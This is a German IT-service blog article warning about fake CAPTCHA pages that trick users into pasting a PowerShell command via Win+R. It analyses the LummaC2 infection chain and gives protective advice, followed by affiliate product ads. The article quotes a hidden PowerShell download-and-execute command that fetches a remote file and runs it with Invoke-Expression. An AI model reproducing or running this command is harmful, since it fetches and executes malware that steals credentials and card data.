Fake CAPTCHA als Malware-Risiko: BSI rät zu besonderer Vorsicht

Die dunkle Seite der CAPTCHAs

CAPTCHAs sind seit Jahrzehnten ein bewährtes Mittel, um Websites vor automatisierten Angriffen zu schützen. Sie verlangen vom Nutzer, bestimmte Bilder auszuwählen, Zeichen einzugeben oder einfach ein Häkchen zu setzen, um zu beweisen, dass sie keine Bots sind. Genau dieses Vertrauen in CAPTCHAs wird jetzt von Cyberkriminellen missbraucht, um ahnungslose Nutzer zur unbeabsichtigten Installation von Malware zu verleiten.

Fake Captcha Malware

Eine besonders raffinierte Angriffskette wurde vom Conscia Security Operations Center (SOC) entdeckt und als CAPTCHA clipper bezeichnet. Die Methode kombiniert Social Engineering mit technischer Manipulation, um Nutzer zur Ausführung schädlicher PowerShell-Befehle zu bringen.

Das Bundesamt für Sicherheit in der Informationstechnik (BSI) sowie das Schweizerische Bundesamt für Cybersicherheit (BACS) warnen mittlerweile offiziell vor diesen Attacken.

Technische Analyse der CAPTCHA clipper-Angriffskette

Die Angriffsmethode nutzt mehrere Schritte, um den Schadcode auf den Systemen der Opfer auszuführen. Dabei wird eine Kombination aus JavaScript-Manipulation, PowerShell-Missbrauch und Command-and-Control (C2)-Kommunikation verwendet. Die folgenden Schritte beschreiben die technischen Hintergründe dieses raffinierten Angriffs.

1. Initiale Infektion: Das präparierte CAPTCHA

Der Angriff beginnt mit einer präparierten Webseite, die ein vermeintlich legitimes CAPTCHA enthält. Die technische Manipulation erfolgt über eingebettetes JavaScript, das eine bösartige Nutzlast vorbereitet.

Wie das bösartige CAPTCHA funktioniert:

  • Nutzer stoßen auf eine gefälschte Website, die ein Cloudflare-ähnliches CAPTCHA anzeigt.
  • Sobald das Häkchen bei „Ich bin kein Roboter“ gesetzt wird, wird unbemerkt ein PowerShell-Befehl in die Zwischenablage kopiert.
  • Ein zweites Pop-up-Banner erscheint mit Anweisungen zur Tastatureingabe. Hier werden Nutzer dazu gebracht:
  1. Win + R zu drücken, um das Ausführen-Fenster zu öffnen.
  2. Strg + V zu nutzen, um den schädlichen PowerShell-Befehl aus der Zwischenablage einzufügen.
  3. Enter zu drücken, wodurch der Befehl ohne das Wissen des Nutzers ausgeführt wird.

2. Der PowerShell-Angriff

Der kopierte PowerShell-Befehl ist darauf ausgelegt, Schadsoftware direkt aus dem Internet zu laden und auszuführen. Ein Beispiel für einen solchen Befehl nennt Consica im Blogartikel:

powershell -WindowStyle Hidden -Command “$rQd=‘https://xxxxxxxxxxxxx[.]net/prizev2[.]txt’; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;”

Was passiert bei der Ausführung dieses Befehls?

  • Die Datei prizev2.txt wird von einem externen Server geladen.
  • Diese Datei enthält weitere verschlüsselte Schadcode-Befehle, die mit Invoke-Expression direkt in der PowerShell ausgeführt werden.
  • Die Malware wird direkt im Speicher ausgeführt, um klassische Antiviren-Scanner zu umgehen.
  • In vielen Fällen wird eine Backdoor geöffnet, um weitere Schadsoftware herunterzuladen.

3. Installation und Persistenz

Nach der initialen Infektion installiert sich die Malware, indem sie:

  • Eine ZIP-Datei (prize.zip) von einem externen Server herunterlädt.
  • Die enthaltene Datei setup.exe ins APPDATA-Verzeichnis extrahiert und automatisch startet.
  • Persistenzmechanismen nutzt, darunter:
  • Eintrag in den Windows-Taskplaner, um sich nach jedem Neustart erneut auszuführen.
  • Erstellung einer zusätzlichen Datei (69HT8K.pif), die als Tarnung oder für weitere Angriffe genutzt wird.

Verwendete Techniken in der Übersicht

Die CAPTCHAclipper-Angriffskette setzt eine Vielzahl moderner Angriffstechniken ein:

TechnikErklärung
Social EngineeringNutzer werden durch bekannte Sicherheitsmechanismen (CAPTCHA) in falscher Sicherheit gewogen und zu gefährlichen Handlungen verleitet.
Clipboard HijackingSchadcode wird unbemerkt in die Zwischenablage kopiert und durch Nutzer selbst eingefügt.
Fileless MalwareSchadcode wird direkt im Arbeitsspeicher ausgeführt, ohne Dateien auf der Festplatte zu hinterlassen.
PowerShell ExploitationDie PowerShell wird als legitimes Windows-Werkzeug genutzt, um Befehle zu laden und auszuführen.
C2-KommunikationDie Malware baut eine Verbindung zu einem Angreifer-Server auf, um weitere Befehle zu empfangen.
Persistenz-MechanismenAutomatischer Neustart durch den Taskplaner oder das Eintragen ins APPDATA-Verzeichnis.

Wer steckt hinter den Angriffen?

Laut Conscia Security Operations Center (SOC) handelt es sich um einen erfahrenen Bedrohungsakteur, der gezielt Nutzer in Europa angreift. Die Hauptnutzlast wurde als eine Variante der LummaC2-Malware identifiziert, die darauf ausgelegt ist:

  • Zugangsdaten aus Webbrowsern und Messenger-Apps zu stehlen.
  • Kreditkarteninformationen abzugreifen.
  • Befehle auszuführen, um weitere Schadsoftware zu installieren.

Ein genaues Attributionsmodell liegt noch nicht vor, jedoch weisen die Angriffe auf eine hochentwickelte Gruppe hin, die in der Lage ist, ihre Angriffsstrategien dynamisch anzupassen, um Sicherheitslösungen zu umgehen.


Wie kann man sich schützen?

Um sich vor dieser neuen Angriffsmethode zu schützen, sollten Nutzer folgende Maßnahmen ergreifen:

1. Sicherheitsbewusstes Verhalten

  • Keine Tastenkombinationen auf unbekannten Webseiten ausführen!
  • Falls nach einem CAPTCHA eine zusätzliche Anweisung erscheint, sofort den Browser schließen.
  • Besondere Vorsicht bei Werbebannern oder Pop-ups, die eine Aktion verlangen.

2. Technische Schutzmaßnahmen

  • PowerShell restriktiver konfigurieren, z. B. durch Gruppenrichtlinien (Set-ExecutionPolicy Restricted).
  • Zwischenablage-Überwachung aktivieren, um unerwartete Inhalte zu blockieren.
  • Nutzung eines modernen Virenschutzes mit heuristischer Analyse.

3. Was tun im Infektionsfall?

Sollte der Verdacht bestehen, dass der eigene Rechner infiziert wurde:

  1. Sofort das Gerät vom Netzwerk trennen.
  2. Alle Passwörter ändern, insbesondere für Online-Banking und E-Mail-Konten.
  3. Den Rechner neu aufsetzen, um sicherzustellen, dass keine versteckte Schadsoftware aktiv bleibt.

Laut dem BSI und dem BACS sollten betroffene Systeme vollständig gelöscht und neu installiert werden, da moderne Malware oft tief ins System eingreift und nicht ohne Weiteres entfernt werden kann.

Fazit: Ein Weckruf für IT-Sicherheit

Die CAPTCHAclipper-Angriffe zeigen, wie Cyberkriminelle zunehmend kreative Methoden nutzen, um Sicherheitsmaßnahmen in Angriffsvektoren zu verwandeln. Durch die geschickte Kombination aus technischen Exploits und psychologischer Manipulation gelingt es den Tätern, Nutzer unbemerkt in die Falle zu locken.

Besonders besorgniserregend ist, dass die genutzten Techniken leicht angepasst und wiederverwendet werden können. Auch wenn bereits einige Sicherheitslösungen die erkannten Indikatoren für Kompromittierung (IOCs) blockieren, werden neue Varianten entstehen.

Nutzer und Unternehmen müssen daher wachsam bleiben, ihre IT-Sicherheitsstrategien kontinuierlich aktualisieren und sich stets bewusst sein: Nicht jedes CAPTCHA ist harmlos.

Wie hilfreich war dieser Beitrag?

Klicke auf die Sterne um zu bewerten!

Es tut uns leid, dass der Beitrag für dich nicht hilfreich war!

Lasse uns diesen Beitrag verbessern!

Wie können wir diesen Beitrag verbessern?

Meroth IT-Service ist Ihr lokaler IT-Dienstleister in Frankfurt am Main für kleine Unternehmen, Selbstständige und Privatkunden


Kostenfreie Ersteinschätzung Ihres Anliegens?

❱ Nehmen Sie gerne Kontakt auf ❰

Werbung

CHERRY STREAM KEYBOARD, Kabelgebundene Tastatur, Deutsches Layout (QWERTZ), Flüsterleiser Tastenanschlag, Einzigartiges Tippgefühl, Flaches Design, Schwarz
CHERRY STREAM KEYBOARD, Kabelgebundene Tastatur, Deutsches Layout (QWERTZ), Flüsterleiser Tastenanschlag, Einzigartiges Tippgefühl, Flaches Design, Schwarz*
UVP**: € 36,99
€ 25,90
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 26,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Gigaset E560HX - DECT-Mobilteil mit Ladeschale - Fritzbox-kompatibel - Schnurloses Senioren-Telefon für Router und DECT-Basis - Notruf mit 4 Nummern, silber [Deutsche Version] [Ohne Basis]
Gigaset E560HX - DECT-Mobilteil mit Ladeschale - Fritzbox-kompatibel - Schnurloses Senioren-Telefon für Router und DECT-Basis - Notruf mit 4 Nummern, silber [Deutsche Version] [Ohne Basis]*
UVP**: € 79,99
€ 56,05
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 59,00
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
UGREEN Nexode USB C Ladegerät 65W GaN Netzteil mit 3X USB-C-Port Schnellladegerät Kompakt Charger kompatibel mit MacBook Pro/Air, HP Laptop, iPad Pro, iPhone 16, 16 Pro, Galaxy S24
UGREEN Nexode USB C Ladegerät 65W GaN Netzteil mit 3X USB-C-Port Schnellladegerät Kompakt Charger kompatibel mit MacBook Pro/Air, HP Laptop, iPad Pro, iPhone 16, 16 Pro, Galaxy S24*
UVP**: € 39,99
€ 22,98
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
SYNOLOGY DX517 - NAS-Server DiskStation DX517 - Erweiterung
SYNOLOGY DX517 - NAS-Server DiskStation DX517 - Erweiterung*
€ 491,99
Preise inkl. MwSt., zzgl. Versandkosten
€ 492,00
Preise inkl. MwSt., zzgl. Versandkosten
€ 548,94
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Canon i-SENSYS LBP631cw Laserdrucker - A4, Drucker, 18 Seiten/Min, USB, WLAN
Canon i-SENSYS LBP631cw Laserdrucker - A4, Drucker, 18 Seiten/Min, USB, WLAN*
€ 199,99
Preise inkl. MwSt., zzgl. Versandkosten
UVP**: € 229,00
€ 216,43
Gewöhnlich versandfertig in 3 bis 4 Tagen
Preise inkl. MwSt., zzgl. Versandkosten
Brother DCP-L2665DW – 3-in-1-Multifunktionsgerät (Drucken/Scan/Kopieren) Laserdrucker Monochrom – WLAN & Ethernet – Automatischer Dokumentenzuzug für 50 Blatt – Druckgeschwindigkeit von 34 Seiten pro
Brother DCP-L2665DW – 3-in-1-Multifunktionsgerät (Drucken/Scan/Kopieren) Laserdrucker Monochrom – WLAN & Ethernet – Automatischer Dokumentenzuzug für 50 Blatt – Druckgeschwindigkeit von 34 Seiten pro*
UVP**: € 339,00
€ 279,90
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
TP-Link PGW2440 KIT WLAN Powerline 𝐆.𝐡𝐧𝟐𝟒𝟎𝟎, 𝐀𝐗𝟏𝟖𝟎𝟎 𝐖𝐢-𝐅𝐢 𝟔, bis zu 1428 Mbps über Powerline, Gigabit Ethernet, Extra-Steckdose, Plug & Play, Nicht kompatibel mit HomePlug AV/AV2
TP-Link PGW2440 KIT WLAN Powerline 𝐆.𝐡𝐧𝟐𝟒𝟎𝟎, 𝐀𝐗𝟏𝟖𝟎𝟎 𝐖𝐢-𝐅𝐢 𝟔, bis zu 1428 Mbps über Powerline, Gigabit Ethernet, Extra-Steckdose, Plug & Play, Nicht kompatibel mit HomePlug AV/AV2*
UVP**: € 182,66
€ 167,35
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Samsung Portable SSD T7 Shield, 2 TB, USB 3.2 Gen.2, 1.050 MB/s Lesen, 1.000 MB/s Schreiben, Robuste externe Festplatte Outdoor für Mac, PC und Smartphone, Schwarz, MU-PE2T0S/EU
Samsung Portable SSD T7 Shield, 2 TB, USB 3.2 Gen.2, 1.050 MB/s Lesen, 1.000 MB/s Schreiben, Robuste externe Festplatte Outdoor für Mac, PC und Smartphone, Schwarz, MU-PE2T0S/EU*
UVP**: € 204,90
€ 174,90
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 174,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Kyocera Ecosys PA4500x Laserdrucker Schwarz Weiss, Duplex-Einheit, 45 Seiten pro Minute, Laserdrucker mit 100+500 Blatt Zufuhr, Gigabit LAN. Schwarz-Weiss-Drucker mit Mobile Print
Kyocera Ecosys PA4500x Laserdrucker Schwarz Weiss, Duplex-Einheit, 45 Seiten pro Minute, Laserdrucker mit 100+500 Blatt Zufuhr, Gigabit LAN. Schwarz-Weiss-Drucker mit Mobile Print*
€ 329,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 329,99
Preise inkl. MwSt., zzgl. Versandkosten
Lenovo Yoga Slim 7i Aura Edition AI Laptop | Copilot+ PC | 15,3
Lenovo Yoga Slim 7i Aura Edition AI Laptop | Copilot+ PC | 15,3" 2.8K WQXGA Display | Intel Core Ultra 7 | 16GB RAM | 1TB SSD | Intel Arc Grafik | Windows11 | QWERTZ | Luna Grau | 2 Jahre Premium Care*
UVP**: € 1.499,00
€ 1.179,00
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 1.229,00
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Anker 565 11-in-1 USB-C Hub, Docking-Station mit 10 Gbps USB-C & USB-A Datenports, 4K HDMI, DisplayPort, 100W PD, 2 USB 2.0 Daten, Ethernet, AUX, microSD & SD, Für MacBook Pro und mehr
Anker 565 11-in-1 USB-C Hub, Docking-Station mit 10 Gbps USB-C & USB-A Datenports, 4K HDMI, DisplayPort, 100W PD, 2 USB 2.0 Daten, Ethernet, AUX, microSD & SD, Für MacBook Pro und mehr*
UVP**: € 89,99
€ 59,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Crucial X9 Pro 2TB Portable SSD Festplatte mit USB-A Adapter, bis zu 1050MB/s Lesen/Schreiben, , Wasser- und Staubgeschützt (IP55), Externe SSD, USB-C 3.2 - CT2000X9PROSSD902
Crucial X9 Pro 2TB Portable SSD Festplatte mit USB-A Adapter, bis zu 1050MB/s Lesen/Schreiben, , Wasser- und Staubgeschützt (IP55), Externe SSD, USB-C 3.2 - CT2000X9PROSSD902*
Kein Angebot verfügbar.
SYNOLOGY Rackstattion RS422+ mit 4 Bays
SYNOLOGY Rackstattion RS422+ mit 4 Bays*
€ 661,93
Gewöhnlich versandfertig in 2 bis 3 Tagen
Preise inkl. MwSt., zzgl. Versandkosten
Anker 521 Ladegerät, Anker Nano Pro, Kompaktes 40W PIQ 3.0 Dual-Port USB-C Netzteil, Kompatibel mit iPhone 15/14/13/12 Serie, iPad Mini, MacBook Air, und mehr, Arktis
Anker 521 Ladegerät, Anker Nano Pro, Kompaktes 40W PIQ 3.0 Dual-Port USB-C Netzteil, Kompatibel mit iPhone 15/14/13/12 Serie, iPad Mini, MacBook Air, und mehr, Arktis*
€ 29,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Gigaset CL390HX - Design DECT-Mobilteil mit Ladeschale - Fritzbox-kompatibel - Schnurloses Telefon für Router und DECT-Basis - 2 Akustik-Profile, weiß [Deutsche Version] [Ohne Basis]
Gigaset CL390HX - Design DECT-Mobilteil mit Ladeschale - Fritzbox-kompatibel - Schnurloses Telefon für Router und DECT-Basis - 2 Akustik-Profile, weiß [Deutsche Version] [Ohne Basis]*
UVP**: € 49,99
€ 33,50
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Canon PIXMA TS7650i Serie – All-in-One-Drucker für den Heimgebrauch | Kabellos für einfaches Drucken von deinem Smartphone Drucker für Zuhause mit PIXMA Print Plan
Canon PIXMA TS7650i Serie – All-in-One-Drucker für den Heimgebrauch | Kabellos für einfaches Drucken von deinem Smartphone Drucker für Zuhause mit PIXMA Print Plan*
UVP**: € 145,00
€ 79,00
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 94,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
(*) Affiliate-Links: Wenn Sie auf einen dieser Links klicken und einkaufen, erhalte ich eine Provision. Für Sie verändert sich der Preis dadurch nicht. Zuletzt aktualisiert am 12. Juni 2025 um 2:22. Die hier gezeigten Preise können sich zwischenzeitlich auf der Seite des Verkäufers geändert haben. Alle Angaben ohne Gewähr.
(**) UVP: Unverbindliche Preisempfehlung

Preise inkl. MwSt., zzgl. Versandkosten
Nach oben scrollen